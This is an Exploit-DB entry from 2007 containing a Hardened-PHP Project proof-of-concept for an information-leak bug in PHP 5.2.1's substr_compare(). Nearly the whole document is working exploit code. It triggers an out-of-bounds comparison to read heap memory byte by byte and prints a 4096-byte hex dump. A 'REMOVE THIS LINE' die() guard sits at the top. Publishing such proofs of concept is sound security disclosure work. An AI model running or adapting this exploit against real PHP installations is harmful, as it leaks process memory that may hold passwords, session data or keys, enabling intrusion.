PHP 5.2.1 - 'substr_compare()' Information Leak

EDB-ID:

3424




Platform:

Multiple

Date:

2007-03-07


<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //        PHP 5 - substr_compare Information Leak Vulnerability       //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  $sizeofHashtable = 39;
  $maxlong = 0x7fffffff;
  if (is_int($maxlong+1)) {
    $sizeofHashtable = 67;
    $maxlong = 0x7fffffffffffffff;
  }

  $memdump = str_repeat("A", 4096);
  for ($i=0; $i<40; $i++) $d[] = array();
  unset($d[20]);
  $x = str_repeat("A", $sizeofHashtable);
  
  // If the libc memcmp leaks the information use it
  // otherwise we only get a case insensitive memdump
  $b = substr_compare(chr(65),chr(0),0,1,false) != 65;

  for ($i=0; $i<4096; $i++) {
    $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
    $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
    if ($y-$Y == 1 || $Y-$y==1){
      $y = chr($y);
      if ($b && strtoupper($y)!=$y) {
        if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
          $y = strtoupper($y);
        }
      }
      $memdump[$i] = $y;
    } else {
      $memdump[$i] = chr(0);
    }
  }
  
  echo "memdump\n---------\n\n";
  
  for ($b=0; $b<strlen($memdump); $b+=16) {
    printf("%08x: ", $b);
    for ($i=0; $i<16; $i++) {
      printf ("%02x ", ord($memdump[$b+$i]));
    }
    for ($i=0; $i<16; $i++) {
      $c = ord($memdump[$b+$i]);
      if ($c >= 127 || $c < 32) {
        $c = ord(".");
      }
      printf ("%c", $c);
    }
    printf("\n");
  }

?>

# milw0rm.com [2007-03-07]